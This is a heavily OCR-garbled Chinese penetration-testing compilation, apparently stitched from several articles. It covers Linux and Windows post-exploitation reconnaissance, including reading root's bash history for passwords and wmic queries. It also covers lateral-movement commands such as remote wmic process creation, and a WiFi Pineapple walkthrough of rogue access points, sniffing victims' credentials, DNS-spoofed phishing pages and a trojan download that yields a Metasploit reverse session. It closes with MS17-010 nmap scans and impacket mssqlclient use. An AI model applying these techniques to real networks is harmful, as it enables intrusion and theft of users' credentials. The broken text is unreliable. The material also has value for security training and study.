f lags=4163<UP, BROADCAST, RUNNING ,MULTICAST> mtu 1580 
inet 192.168.232.188 netmask. 255 255.8. broadcast 192.168.232.255 
inet6 fe88: :afca:1bf6:864f  prefixlen 64  scopeid 8x2B8«link» 
ether 88:8 :47:b4:22  txqueuelen 1088 (Ethernet) 
RX packets 287 - bytes 12969 (12.6 KiB) 
RX errors 8 dropped 8 overruns B frame 8 
TX pack 19 bytes 1314 (1.2 KiB) 
TX errors @ dropped B overruns @ carrier 8 collisions 8 


(^: flags-4163«UP , BROADCAST, RUNNING, MULTICAST> “mtu 1588 
inet 192.168. 3?. netmask 255.255.255.8. broadcast 192.168.232.255 
inet6 fe88: 924:fc7d:59e8  prefixlen 64 scopeid Bx2B8«link» 
ether 88:0c:29:4?:b4:2c  txqueuelen 1888 . (Ethernet) 
RX 8 byte 7? (1.8 KiB) 
X 8 drop; 8 overruns B. frame 8 


t packets 15 bytes 1928 (1.8 KiB) 
TX errors @ dropped 8 overruns B carrier @ collisions B 


lo: flags=?3<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.8.0.1 netmask 255.8.8.8 
inet6 ::1 prefixlen 128 scopeid 8x18«host» 
loop txqueuelen A> (Local Loopback) 
RX packets 16 “bytes 1528 (1/4 KiB} > A 
RX errors 8 -dropped 8 overruns # frame 0 
TX packets 16 “bytes 1528 (1.4 KiB) T 
TX errors 8 dropped B overruns B can 





0x03-3 查看 端口 状态 《开启 了 哪些 服务 ， 内 网 IP 连 接 等 ) 


netstat -anpt 


[root@localhost ^] netstat -anpt 


Active Internet connections and established) 


Proto Recu-(] Send-( Local Addres 
A 6.8.6.8: 


tcp 
tcp 
tep 
tep 
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a 
B 
8 


7.6.8.1 


Foreign Address 


4.4.0.8: ™ 
6.6.4.0:* 


LI 


State 
„ISTEN 


l 
LISTEN 
LISTEN 
LI 


0x03-4 查看 进程 状态 (开启 了 哪些 服务 等 ) 


ps 


root 
root 
rout 
root 
root 
rout 
root 
toot 
root 
root 
ro 
root 
root 
root 
ront 
root 
root 
polk 
root 
root 
root 
root 
root 
abu 
root 
root 
root 
root 
root 
root 
root 
root 
root 
root 
root 
foot 
root 
post i 
postfix 
root 
root 
root. 
voat, 
Jot, 


aed 


288 ttyl 


"i 
TE 
wf 
«t 
T 
xf sad t 


kámt Tush 


irqbala 
STIS 
daemon 


46:2) 
root 


b inzpython 


Lkoorkerzz 
Lkuorker2h: 1H] 
hin^dhcl ient 


usp7sbin. 


t unix 
[kworkers3: iH) 
bash 
fkuorker/6: 1H] 
Lkwack 
Tkworkers2 


armi 


foreground 
temd- logind 
stem aldre m 


wsrzsbinzf irewlld = nofork 
gor kMenager 


no- daemon 


nopidf ade 


nopid 


PID/Program name 
1125 sshd 
1363^master 
1125/sshd 
1363/master 





ib. NetworkManager 





0x03-5 查看 管理 员 的 历史 输入 命令 (获取 密码 ， 网 站 目录 ， 


内 网 资产 等 信息 ) 


cat /root/.bash_history 
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f prot version 
(t /etc/redhat release 


if conf ig 
add 
etczsusconf ig 
n twork cripts^ 


aidu.com -C 1 


usconf ig/network-scripts/ 
tezsusconf ig/network-scripts/ 
ifcig enp8s3 


network 


network 


E 

if Cf nj ens33 

onf ig 

temctl restart network 
f conf ig 
ing baidu.com 
ustemctl restart network 
if conf iq 


" 


bs 
hutdoun -r now 





0x03-6 查找 某 个 文件 (寻找 配置 文件 等 ) 


find / -name * cfg 


[roots localhost r T# f 
"'oDt^ànaconda-ks .ctg 









md ^ -name *.cfg 
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后 渗透 信息 收集 之 wmic 命 令 的 一 些 使 用 方法 


0x00. 前 言 


wmic 和 cmd 一 样 在 所 有 的 windows 版 本 中 都 存在 ， 同 时 wmic 有 很 多 cmd 下 不 方便 使 用 的 部 分 ， 今 天 
给 大 家 介绍 一 些 在 后 渗透 过 程 中 非常 适用 的 使 用 wmic 进 行 信息 收集 的 命令 。 


0x01. 关 于 wmic 


WMlI 命 令 行 (WMIC) 实用 程序 为 WMI 提 供 了 命令 行 界面 。WMIC 与 现 有 的 Shell 和 实用 程序 命令 兼 
容 。 在 WMIC 出 现 之 前 ， 如 果 要 管理 WMI 系 统 ， 必 须 使 用 一 些 专门 的 WMI 应 用 ， 例 如 SMS， 或 者 使 
用 WMI 的 脚本 编程 APl， 或 者 使 用 象 CIM Studio 之 类 的 工具 。 如 果 不 熟 悉 C++ 之 类 的 编程 语言 
VBScript 之 类 的 脚本 语言 ， 或 者 不 掌握 WMI 名 称 空间 的 基本 知识 ， 要 用 WMI 管 理 系 统 是 很 困难 的 。 
WMIC 改 变 了 这 种 情况 。 


0x02.wmic 的 简单 使 用 


首先 在 cmd 命 令 行 输入 wmic 进 入 交互 式 页面 ， 这 里 说 一 下 在 powershell 也 可 以 和 cmd 命 令 行 一 样 的 
操作 。 





| mc \Windows\system32\cmd. exe - wmic | 3 


Microsoft Windows 【版 本 6.1.7601] _ 
版 权 所 有 (c) 2009 Microsoft Corporation 


C:\Users\cjx>wmic 
umic:rootNcli», 
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wmic /? 





CAWindows\system32\cmd.exe -wmic 


Microsoft Windows [ GF T6901] ; 
i & (c) 2009 Microsoft Corporation, 


Users\cjx>wmic 
umic:rootNcli»/? 


B[ global switches] <command> 


e following global switches are available: 
Path for the namespace the alias operate against 
Path for the role containing the alias definitions. 
Servers the alias will operate against. 
Client impersonation level, 
Client authentication level. 
Language id the client should use. 
RIVILEGES Enable or disable all privileges. 
/TRACE Outputs debugging information to stderr. 
ECORD Logs all input commands and output. 
TERACTIVE Sets or resets the interactive mode. 
/FAILFAST Sets or resets the FailFast mode. 
/USER User to be used during the session. 
/PASSWORD Password to be used for session login. 
/OUTPUT Specifies the mode for output redirection. 
/ APPEND Specifies the mode for output redirection. 
/AGGREGATE Sets or resets aggregate mode. 





process /? # 进 程 管理 的 帮助 # 


wmic:root\cli>process /? 
PROCESS - Process management. 


HINT: BNF for Alias usage. 
alias?» [WMIObject] | «alias» [<path where>] | [<alias>] «path where») [<verb clause>] 


ASSOC [<format specifier>] 

CALL <method name> [<actual param list>] 
CREATE «assign list» 

DELETE 

GET [<property list>] [<get switches>] 
LIST [<list format>] [<list switches>] 





wmic process get /?# 属 性 获取 操作 帮助 
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Wmic:rootXcli»process get /? 


Property get operations 
SAGE 


>] [<get switches>] 
= <property name> | <property name> property list> 


Type Operation 


N/A 
CommandLine N/A 
Description N/A 
ExecutablePath N/A 
ExecutionState N/A 
Handle N/A 
HandleCount N/A 
InstallDate N/A 
KernelModeTime N/A 
MaximumllorkingSet$ize N/A 
MinimumllorkingSet$ize N/A 

N/A 

N/A 

to continue, or press the ESCAPE ke 


根据 自己 实际 的 需要 去 对 相关 的 信息 进行 读 取 


0x03. 以 进程 为 例 展现 wmic 的 使 用 


这 里 的 靶 机 使 用 的 是 一 台 win7 x86 的 虚拟 机 这 里 以 查看 进程 为 例 : 





wmic process get caption,executablepath,processid # 获 取 系 统 当前 正在 运行 的 进程 、 进 程 


wmic:root\cli>process get caption, executablepath, processid 
Caption ExecutablePath 
System Idle Process 





UGAuthService. exe 
umtoolsd.exe v1 





wmic service where (state="running") get name ,processid ,pathname ,startmode ,c 
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startmode caption 


alServiceNetworkRestric 
LocalServiceNoNetwork 








wmic onboarddevice get Description, DeviceType, Enabled, Status /format:list #3 


arddevice get Description. DeviceType, Enabled, Status /format:list 





wmic product get name “ # 系 统 安装 软件 情况 S 


root\cli>product get name 


- 14.20.27508 





Wmic environment get Description, VariableValue # 系 统 环境 变量 # 
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on. Variabletialue 
leual 


stem32\ulb EMROOT?\ System32\WindowsF $hellNu] O\.C:\Python2s 


Family 23 Model 1? Stepping ©, quthenticAMD 


em32\WindowsPowerShell\ul OXModules 


ilogfile. log 


LEZ\AppData\Local\ Temp 
FILEZXAppData LocalVTemp 





wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles/forme 


Mmic.rootycliocomputers ^ get Name Domain, Manufacturer. Model, Username, Roles/format: list 


Name=WmiAcpi 

PathName=C : \lindows\system32\drivers\wmiacpi.sys 
ServiceType:Kernel Driver 

State=Stopped 

Status-OK 


NCaption=Windows E E^ 2 .0 Non-IFS 

Name=ws2ifsl 

PathName=C: \Windows\system32\drivers\ws2ifsl.sys 
ServiceType=Kernel Driver 

State=Running 

Status-OK 


Caption:User Mode Driver Frameworks Platform Driver 
Name=WudfPf 
PathName=C: \Windows\system32\drivers\WudfPF. sys 


Status=OK 





关于 更 多 的 信息 可 以 通过 官方 的 说 明文 档 


0x04. 关 于 powershell 的 Get-Wmi WR 


Get-Wmi 是 获取 Windows Management Instrumentation (WMI) 类 的 实例 或 有 关 可 用 类 的 信息 。 
我 们 需要 首先 知道 自己 的 windows 计 算 机 支持 那些 可 用 的 WMI 类 。 
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Get-Wmiobject - list  # 自 己 的 windows 计 算 机 支持 那些 可 用 的 WMI 类 # 


"PowerShell uA: 
Pe) 2009 Microsoft Corporation. 保留 


s\cjx> Get-Wmiobject -list 


ROOf^cimu2 


NameSpace 


Methods 


Name 


NotifyStatus 
““extendedStatus 
luin32 PrivilegesStatus 
luin32. JobObjectStatus 
上 securityRelatedClass 
^ Trustee 
lwin32_Trustee 

NTLMUser 9X 


ecurityDescriptor 
METERS 
stemClass 
ProviderRegistration 
EventProviderRegistration 
E bjectProviderRegistration 
ProviderRegistration 
InstanceProviderRegistration 
MethodProviderRegistration 
"PropertuProviderRegistration 
E entConsumerProviderRegistration 
__thisNAMESPACE 
_NAMESPACE 
_IndicationRelated 
_FilterToConsumerBinding 
_..Event Consumer 
__AggregateEvent 


例子 :在 本 地 计算 机 上 获取 进程 





PS C:NUserNcjx»Get-WmiObiect 


Properties 


{StatusCode) 

(Description, Operation, ParameterInfo, ProuiderName...) 
(Description, Operation, ParameterInfo, PrivilegesNotHeld...) 
(AdditionalDescription, Description, Operation, ParameterIn... 
0 

(Domain, Name, SID, SidLength...) 

(Domain, Name. SID, SidLength...) 

(Authority, Flags, Mask, Name...) 

{AccessMask, AceFlags, AceType, GuidInheritedObjectTupe...) 
{AccessMask, AceFlags, AceType, GuidInheritedObjectType. . . } 
(ControlFlags, DACL. Group, Owner...) 

(ControlFlags, DACL, Group. Ouner...) 

0 

0 

{provider} 

(EventQueryList, provider) 

(InteractionTupe, provider, QuerySupportLevels, SupportsBat . 
(CacheRefreshInterval, InteractionType, PerUserSchema, prov... 
(InteractionTupe, provider, QuerySupportLevels, SupportsBat... 
(provider) 

(provider, SupportsGet, SupportsPut) 

(ConsumerClassNames, provider) 

(SECURITY DESCRIPTOR) 

{Name} 

Q0 

(Consumer, CreatorSID, DeliverSynchronously, DeliveruQoS...) 
(CreatorSID, MachineName, MaximumQueueSize] 

(NumberOfEuents, Representatiue) x 


位 于 命令 管道 位 置 1 的 cmdlet Get-WmiObject 


请 为 以 下 参数 提供 值 : 
Class: Win32_Process 


# 在 本 地 计算 机 上 获取 进程 # 
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PS C:\Users\cjx> Get-Wmidbject 


1 的 cmdlet Get-limiObject 
上 A: 
: Win32_Process 


__SUPERCLASS : CIM_Process 

__DYNASTY : CIM_ManagedSystemElement 

__RELPATH : Win32_Process.Handle="852" 

__PROPERTY_COUNT : 45 

__DERIUATION : (CIM Process, CIM LogicalElement, CIM_ManagedSyste 
mElement } 

-SERVER : WIN-4BKLI131A8U 

__NAMESPACE : root\cimu2 

__PATH : \\WIN-4BKLI131A8U\root\cimu2:Win32_Process .Handle= 
"852" 

Caption svchost.exe 

CommandLine 

CreationClassName : Win32_Process 

CreationDate : 20191202193042.118823+480 

CSCreationClassName : Win32_ComputerSystem 

CSName : WIN-4BKLI131A8U 

Description : Svchost.exe 

ExecutablePath 

ExecutionState 

Handle : 852 

HandleCount 4 993 

InstallDate i : 

KernelModeTime : 112944724 

MaximumllorkingSetSize 











Get-WmiObject 和 wmic 相 比 ， 可 以 说 是 一 个 升级 版 ，Get-WmiObject 可 以 指定 一 个 参数 进行 使 用 
(Parameters) 例如 在 本 地 计算 机 上 获取 进程 ， 也 可 以 指定 相应 的 参数 进行 一 个 查询 它 的 一 个 过 


fE. 














Get-WmiObject -Class Win32_Process # 在 本 地 计算 机 上 获取 进程 # 














具体 的 参数 以 及 命令 在 官方 文档 中 进行 查询 


mee 















7 常见 端口 


yer Message Block) Windows 协 议 族 ， 主 要 功能 为 文件 打印 共享 服务 ， 简 单 来 讲 就 是 共 


来 内 网 横向 扩展 中 比较 火 的 端口 ， 大 名 昂昂 的 永恒 之 蓝 漏洞 就 是 利用 该 端口 ， 操 作 
夯 在 MS17-010 漏 洞 。 正 常情 况 下 ， 其 命令 主要 是 建立 IPC 服 务 () 


18192.168.1.2 


13192.168.1.2 /user:aNusername password 
"NÉ, 


me 中 a 为 工作 组 情况 下 的 机 器 命名 ， 可 以 为 任意 字符 ,例如 


rname 


492.168.1.2 /user:test\username password 


^. 138. 139 


137、138 为 UDP 端 吕 ， 主 要 用 于 内 网 传输 文件 ， 而 NetBios/SMB 服 务 的 获取 主要 是 


Y 


CO M 和 RPC (Remote Procedure Call) 服务 ， 我 们 利用 这 个 端口 主要 做 
agement Instrumentation) 管理 工具 的 远程 操作 。 


Global Switch", 需 要 使 用 双 引号 把 该 加 的 地 方 都 加 上 
全 策略 的 “网 络 访问 : 本 地 帐户 的 共享 和 安全 模式 "应 设 为 "经 典 -本 地 用 户 以 自 


状态 
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wmic /node: ; s /user:domain\username /password: 12” process call creat 


同时 ，wmic 还 有 很 多 版 本 类 似 于 python 版 本 、Powershell 版 本 和 exe 版 本 等 等 


该 端口 还 可 以 验证 是 否 开 启 Exchange Server 


Port: 53 
该 端口 为 DNS 服务 端口 ， 只 要 提供 域名 解析 服务 使 用 ， 该 端口 在 渗透 过 程 中 可 以 寻找 一 下 DNS 域 伟 
送 漏洞， 在 内 网 中 可 以 使 用 DNS 协议 进行 通信 传输 ， 隐 蔽 性 更 加 好 ， 人 参考 文章 : 


Port: 389 


用 于 LADP ( 轻 量 级 目录 访问 协议 ) ， 属 于 TCP/IP 协 议 ， 在 域 过 程 中 一 般 出 现在 域 控 上 出 现 该 端 
口 ， 进 行 权 限 认 证 服务 ， 如 果 拥 有 对 该 域 的 用 户 ， 且 担心 net 或 者 其 他 爆破 方法 不 可 行 的 情况 ， 可 以 
尝试 使 用 LADP 端 口 进行 爆破 。 


工具 可 以 使 用 类 似 于 hydra 等 开源 项 目 


Port: 88 


该 端口 主要 开启 Kerberos 服 务 ， 属 于 TCP/IP 协 议 ， 主 要 任务 是 监听 KDC 的 票据 请 求 ， 该 协议 在 渗透 
过 程 中 可 以 进行 黄金 票据 和 和 白银 票据 的 伪造 ， 以 横向 扩展 某 些 服务 。 


Port: 5985 


该 端口 主要 介绍 WinRM 服 务 ，WinRM 是 Windows 对 WS-Management 的 实现 ，WinRM 人 允许 远程 用 
户 使 用 工具 和 脚本 对 Windows 服 务 器 进行 管理 并 获取 数据 。 并 且 WinRM 服 务 自 Windows Vista 开 始 
成 为 Windows 的 默认 组 件 。 


条 件 : 


* Windows Vista 上 必须 手动 启动 ， 而 Windows Server 2008 中 服务 是 默认 开启 的 。 
。 服务 在 后 台 开 启 ， 但 是 端口 还 没有 开启 监听 ， 所 以 需要 开启 端口 
。 使 用 winrm quickconfig 对 WinRM 进 行 配置 ， 开 启 HTTP 和 HTTPSS 监 听 ， 且 需要 开启 防火 


墙 
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外 部 接 入 点 -WiFi 









章 主要 向 大 家 介绍 WiFi Pineapple (A aM 8 8")i8 & B's zs (898 A, ART 
到 中 间 人 攻击 ， 网 站 钓鱼 和 获得 shell。 文 章 中 主要 使 用 到 DWall、Evil Portal 与 
三 个 模块 。 


开启 与 网 络 桥接 将 菠萝 的 按钮 由 off 划 到 wifi 标志 ， 稍 等 片刻 便 会 向 周围 发 射 两 个 无 线 
信号 是 菠萝 的 管理 ap ， 一 个 是 给 受害 者 使 用 的 开放 ap。 这 两 个 ap 的 ssid 以 及 管理 ap 
菠萝 的 web 管 理 界面 中 设置 。 


Access Points 
开放 ap 


ee 
Open AP SSID 


Hide Open AP 


Management AP 
ssid 


Manage TAP va wwennene 


Key 
D 
“Flap ” 
mes Disable 
Management AP 


需要 给 菠萝 桥接 一 个 网 络 。 菠 萝 本 身 自 带 一 个 有 线 网 口 ， 插 入 网 线 连接 以 太 网 即 可 。 同 时 菠 
持 桥 接 到 一 个 无 线 网 络 上 ， 在 NetWorking 菜 单 的 WiFi Client Mode 模 块 中 ， 点 击 scan 扫 描 周 
选择 需要 桥接 的 ssid， 输 入 密码 连接 即 可 。 


ViFi Client Mode 


Interface 


wianimon r Scan Note Choosing wlan! will interfere with 
E Pin 
. Access Point hhhhh v1 ‘Saeed 
|... Password 
BSSID: A8:C8:3A:40:AF:FF 
SSID: hhhhh 
Channel: 6 
Signal Strength: -45 dBm 
Quality: 65/70 


Security: WPA2 PSK (CCMP) 
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二 . 诱骗 受害 者 连接 钓鱼 ap 


这 里 需要 介绍 到 菠萝 的 PineAP 模 块 ，PineAP 通 过 伪造 Probe Response 帧 ， 欺 骗 客户 端 这 是 一 个 过 
去 成 功 连接 过 的 ap， 从 而 使 得 客户 端 连接 上 我 们 的 钓鱼 热点 。PineAP 的 配置 可 以 参考 如 下 : 


Allow Associations: 允许 客户 端 通过 任何 请 求 的 SSID 连 接 到 菠萝 。 

Log Probes: 允许 Logging 模块 记录 查看 客户 端的 探 针 请 求 。 

Log Associations: 允许 Logging 模块 记录 查看 客户 端的 连接 信息 。 

Beacon Response Beacon: 将 beacon 信 标 发 送 给 客户 端 ， 响 应 客户 端的 探 针 请 求 。 


PineAP 探 测 到 的 附近 客户 端 连接 请 求 。 


MAT 


很 快 有 客户 端 成 功 连接 上 。 


三 .使 用 DWall 进 行 中 间 人 攻击 DWall 中 文 名 称 叫 " 绵 羊 墙 "， 是 菠萝 中 的 一 个 默认 安装 模块 ， 它 可 以 
嗅 探 已 连接 客户 端的 所 有 HTTP 请 求 ， 如 URLs、Cookies、Post Data， 以 及 实时 地 显示 出 客户 端正 
在 浏览 的 图 片 。 
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发 现 受害 者 登录 了 邮箱 ， 噢 探 到 受害 者 邮箱 的 地 址 ， 账 号 密码 和 cookie。 
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四 .DNS 欺骗 原理 


DNS 服务 器 工作 原理 是 ， 存 储 IP 地 址 到 DNS 名 称 映射 的 记录 ( 称 为 资源 记录 ) 数 据 库 ， 联 系 这 些 资源 
记录 与 客户 端 ， 并 将 这 些 资 源 记录 与 其 他 DNS 服务 器 联系 。 而 客户 端 对 于 每 个 通过 互联 网 发 送 的 
DNS 请 求 都 包含 一 个 独特 的 识别 码 ， 其 目的 在 于 辨识 查询 和 响应 ， 并 将 对 应 的 查询 和 响应 配对 在 一 
起 。 这 就 意味 着 ， 如 果 我 们 可 以 拦截 客户 端 发 送 的 DNS 请 求 包 ， 做 一 个 包含 该 识别 码 的 假 数 据 包 ， 
这 样 目标 计算 机 就 会 根据 识别 码 认为 这 个 假 数据 包 就 是 其 需要 的 结果 ， 从 而 接受 我 们 发 送 的 包 。 这 
里 尝试 使 用 nslookup 查 看 域名 解析 情况 ， 用 tracert 命 令 跟 踪 : 无 修改 ，dns 欺 骗 ， 配 置 静态 dns， 三 
种 情况 下 访问 测试 域名 的 路 由 情况 。 


无 修改 : 
本 地 的 dns 如 图 





使 用 nslookup 解 析 测 试 域名 域名 ， 获 得 的 ip 地 址 为 正常 的 域名 对 应 ip。 





dns 欺骗 : 


开启 dns 欺骗 后 ， 客 户 端的 dns 服务 器 已 经 变 成 菠萝 的 服务 器 。 
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发 现 菠萝 服务 器 将 域名 解析 成 菠萝 的 网 关 ， 当 访问 该 域名 时 ， 会 跳 转 至 设置 好 的 部 署 
页 面 (landing page) 。 


YY 
ee 


使 用 nslookup 
在 东欧 网 关上 的 钓鱼 










使 用 tracert 查 看 数据 包 流 向 。 


配置 静态 dns : 


解析 测试 域名 得 到 的 ip 正 常 。 


: 
up www. com 


tracert 跟 踪 路 由 ， 重 新 访问 到 了 域名 正 
确 对 应 的 jp。 由 此 可 见 ， 配 置 静态 的 、 安 全 的 dns 可 以 有 效 防 御 dns 欺 骗 。 


aww 


五 .钓鱼 实例 和 尝试 获取 shell 


此 处 我 们 使 用 到 荡 萝 中 的 DNSMasq Spoof 与 Evil Portal 模 块 。 它 们 的 作用 是 dns 欺骗 ， 获 取 到 受害 
客户 端的 域名 解析 控制 权 。 我 们 可 以 在 hosts 中 设置 想 要 进行 欺骗 的 域名 ， 当 用 户 输入 该 域名 后 ， 模 
会 欺骗 用 户 将 域名 解析 成 我 们 设置 好 的 ip， 此 处 设置 跳 转 到 菠萝 网 关上 。 


Landing Page 是 设置 菠萝 网 关 的 页 面 ， 此 处 我 们 重 定向 到 公 网 上 一 台 配 置 好 钓鱼 网 站 的 vps。 也 可 
给 菠萝 添加 一 张 sd 卡 ， 直 接 将 钓鱼 网 站 文件 放置 到 菠萝 中 。 


1.TP-LINK 管 理 员 密 码 获 取 示 例 


这 里 使 用 到 Evil Portal 模 块 ， 它 是 的 作用 是 可 以 使 接 入 用 户 在 访问 任意 网 站 时 都 跳 转 到 我 们 事先 设 
好 的 Landing page. Landing Page 是 设置 菠萝 网 关 的 页 面 ， 此 处 我 们 重 定向 到 公 网 上 一 人 台 配 置 好 
钓鱼 网 站 的 vps 上 。 也 可 给 菠 葛 添加 一 张 sd 卡 ， 直 接 将 钓鱼 网 站 文件 放置 到 菠萝 中 。 


简单 介绍 模块 中 各 功能 : 

(1)Controls: 模块 的 启用 和 关闭 。 

(2)Word Bench: 工作 目录 ， 可 创建 新 的 Landing page， 包 含 php，js 等 。 

(3)White List: 客户 端 白 名 单 ， 白 名 单 内 的 用 户 不 会 强制 跳 转 到 我 们 地 Landing page。 
(4)Authorized Clients: 当前 通过 Landing page 中 招 过 的 用 户 列表 。 

(5)Live Preview: Landing page 预 览 。 

(6) Evil Portal Change Log: Evil Portal 更 新 日 志 。 
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开启 
后 ， 受 害 者 访问 任意 网 站 ， 都 会 先 跳 转 到 我 们 的 Landing pagel. MFRLEAMA LH. 


— 


者 输入 后 点 击 确定 ， 跳 转 至 提示 页 面 。 


” 


t9 EHMANTE AZ et CAR 
查询 


| qqqaq qqqqdqdqq 


| 123123 |- 3111111111 
qqqq qqqqq 
|. 7 | chentao hdjdjdjdjd 
| | djdjjdj dhj}djdj 
| EU n ELE |..1234565 l 
i | 1234567890 | admin888 
10 rows in set (0.00 sec) 





数据 库 ， 账 号 密码 成 功 存储 。 
3. 某 社交 网 站 网 钓鱼 示例 


此 处 使 用 到 菠萝 中 的 DNSMasq spoof 模 块 。 它 的 作用 是 dns 劫持 ， 获 取 到 受害 客户 端的 域名 解析 控 
Wl, 我 们 可 以 在 hosts 中 设置 想 要 进行 欺骗 的 域名 ， 当 用 户 输入 该 域名 后 ， 模 块 会 欺骗 用 户 将 域名 
解析 成 设置 好 的 jp， 此 处 我 们 设置 跳 转 到 菠萝 网 关上 。 





害 者 输入 域名 时 即 可 跳 转 到 我 们 的 钓鱼 页 面 ， 静 待 受 害 者 输入 账号 密码 登录 。 此 处 还 可 将 公 网 ip 
一 个 具有 迷惑 性 的 域名 绑 定 ， 更 显 逼 真 。 | 
ae 

i 查询 数据 库 ， 账 号 密 
ysql> select * from renren; 
oe ESI URL ROI a eS eo A aid: wal Na Der + 
| id | usr 


| 1321321 


| 1231231231231 | 
| 123456 





码 成 功 保存 。 fOr In set 


qud. E uU QM + 
(0.900 sec) 


3. 尝 试 获取 shell 同样 使 用 DNSMasq Spoof 模 块 ， 我 们 可 以 尝试 使 受害 者 重 定向 到 一 台 公 网 上 的 vps 
来 下 载 木 马 文件 ， 诱 导 受 害 者 点 击 。 木 马 文 件 可 精心 构造 ， 比 如 具有 欺骗 性 的 文件 名 ， 免 杀 木 马 


等 。 


Landing page 设 置 重 定向 到 vps 上 的 木马 地 址 。 静 待 受害 者 点 击 。 


npt 
h FE eo 


x sx 


p 


交 他 下 载 eee 


| 
emt ARH? | 
at or ga FI Pt 2 a 
F zt EM, 248xF 
5 47 107 “i 


E TN 
7.” 


闻 时 在 Vps 上 开启 msf， 监 听 在 木马 中 设置 的 反 连 端 me ner 
B her. x 连 端 口 。 很 快 ， 有 会 话 反弹 到 我 们 的 vps 上 ， 成 功 获 


2019-11:20. 13:46:23 40800 





五 .防护 意见 


1. 配置 静态 可 靠 的 dns。 
2 WEERA SIP HHL HHT E. 
3 提高 安全 意识 ， 不 轻易 连接 不 可 信和 的 、 开 放 的 无 线 热点 。 


外 部 运 维 系统 、VPN 人 入 口 
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常见 漏洞 扫描 
Nmap 扫 描 技 巧 


。 auth 处 理 身份 验证 
。 broadcast 网 络 广播 
。 brute 暴力 猜 解 

。 default 默认 

。 discovery 服务 发 现 
。 dos 拒绝 服务 

。 exploit 漏洞 利用 

。 external 外 部 扩展 
。 fuzzer 模糊 测试 

* intrusive 扫描 可 能 造成 不 良 后 果 
。 malware 检测 后 门 
。 safe 扫描 危害 较 小 
。 version 版 本 识别 

。 vuln 漏洞 检测 


通用 参数 - vuln 


nmap --script=vuln 192.168.117.130 


MS17-010 


nmap --script=smb-vuln-ms17-010 192.168.117.130 
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wordlists# nmap --script=smb-vuln-ms17- 
7.79 ( https://nmap.org ) at 2019-04-30 KE ds 192.168.117.130 
rt for bogon (192.168.117.130) 
{0.000315 Latency). 
closed ports 
SERVICE 
msrpc 
netbios-ssn 
microsoft-ds 
unknown 
pen unknown 
pen unknown 
)pen unknown 
open unknown 


share 


open u 


00:0C:29:06:75:2F (VMware) 


cript results: 
ul 17-010: 


ES 
Code Execution vulnerability in Microsoft SMBvl servers (ms17-010) 


VULNERABLE 
CVE: CVE-2017-0143 
factor: HIGH 
1 remote code execution vulnerability exists in Microsoft SMBv1 
(ms17-010). 


> date: 2017-03-14 
/technet .microsoft.com/en-us/library/security/ms17-010. aspx 
/cye.mitre.org/cgi-bin/cvename.cgi?name-CVE-2017-0143 


/blogs.technet.microsoft.com/msrc/2017/05/12/customer -guidance-for-wannacrypt-attacks/ 


> address (1 host up) scanned in 2.17 seconds 
hare/wordlists# | 
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impacket 框 架 之 mssql 服 务 器 安全 检测 | 


在 实际 渗透 测试 工作 中 经 常会 遇 到 检测 项 目 中 mssqi 服 务 器 安全 性 ， 此 篇 文章 介绍 impacket 框 
架 中 mssqlclient 的 使 用 方法 。 


mssqlclient 与 其 他 工具 相 比 的 优势 


1. 跨 平台 ，python 脚 本 编写 ， 并 且 已 有 exe 和 版 本 。 

2. 命令 行 执行 ， 速 度 快 。 

3. 支持 使 用 socks 代 理 传 输 数 据 。 

4. 支持 以 hash 传 递 的 方式 进行 账号 验证 。 

5. 支持 windows 认 证 模式 进行 mssdl 服 务 的 安全 检测 。 

6. 执行 sql 命 令 可 以 是 交互 式 ， 也 可 以 直接 回 显 sql 命 令 执 行 结果 。 


Mssqicilient 的 基本 使 用 命令 为 
验证 以 windows 认 证 模式 的 mssql 服 务 。 


python mssglclient.py domain/username:password@ip -windows-auth 


验证 以 mssq| 账 号 密码 认证 的 mssql 服 务 。 


python mssglclient.py ./username:password@ip 


验证 以 mssd 账 号 密码 认证 的 mssql 服 务 ， 并 执行 command.txt 内 的 sq 命令 。 


python mssqiclient.py ./username:password@ip -file command.txt 


举例 分 析 几 种 实际 使 用 情况 
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LfewindowsFFHR FEAIWindowsiA Est, mssqiciientillit#RisqlserveriRS28, FER, Mk 
号 验证 通过 后 直接 返回 sql shell. 


q1adnin Des ktop?nssqlclient-exe rootkit /sqladnin@192.168.3.73 -vindows 





9.1? Copyright 2802-2818 Core Security Technologies 


,pt ion required, switching to TLS 
INGECDATABASE?: Old Value: master, New Value: naster 


an ANGE <LANGUAG >: Old Value: None, New Value: it 
ENUCHANGE< PACKETSIZE): Old Value 4696, New Ualue 
SRU-WEB-KIT>: Line 1: © M 
RU WEB°KIT>: Line 1: f+ 
Result: 1 Microsoft SQL Server (1190 852> 
help for extra she 11 commands 
lect vers ion >) 
RU MEB-KIT>: Line 1: ’version’ 


Peyers 10n 


ft SQL Server 2012 11.8.21880.60 (X645 
Feb 18 2012 19:39:15 


Copyright <c) Microsoft Corporation 
Developer Edition (64-bit) on Windows NT 6.2 <X%64> (Build 9200: > (Hyper 


2 前 过 Socks 代 理 ， 在 linux 环 境 下 使 用 windows 认 证 模式 ，mssqlclient 测 试 登陆 sqlserver 服 务 
器 如 下 图 ， 账 号 验证 通过 后 直接 返回 sq| shell. 
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/Desktop/tools/impacket/examples# proxychains python mssqiclient py r 
ootkit/sqladmin@192. 168.3.73 -windows- auth 
ProxyChains-3.1 (http://proxychains.sf.net) 
Impacket v@.9.19 - Copyright 2019 SecureAuth Corporation 


Password: 
[S- chain|-«» T 0 <><>-192.168.3.73:1433-<><>-0K 


] Encryption required, switching to TLS 

] ENVCHANGE (DATABASE): Old Value: master, New Value: master 
] ENVCHANGE (LANGUAGE): Old Value: None, New Value: 简体 中 文 

] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 

] INFO(SRV-WEB-KIT): Line 1: 已 将 数据 库 上 下 文 更 改 为 ‘master’ 
] INFO(SRV-WEB-KIT): Line 1: 已 将 语言 设置 更 改 为 简体 中 文 ， 

] ACK: Result: 1 - Microsoft SQL Server (110 852) 

] Press help for extra shell commands 

L> select @@version 


1 


SQ 


Microsoft SQL Server 2012 - 11.0.21990.60 (X64) 
Feb 10 2012 19:39:15 
Copyright (c) Microsoft Corporation 
Developer Edition (64-bit) on Windows NT 6.2 <xX64> (Build 9200: ) (Hyper 


3. 通 过 socks 代 理 ， 以 mssqI 账 号 验证 方式 测试 登陆 mssql 服 务 器 ， 账 号 验证 成 功 后 执行 


mssql.txt 内 的 sql 命 令 。 
AA 
Bp 


proxychains python mssglclient.py ./sa:admin@192.168.3.73 -file mssgl.txt 
如 下 图 所 示 


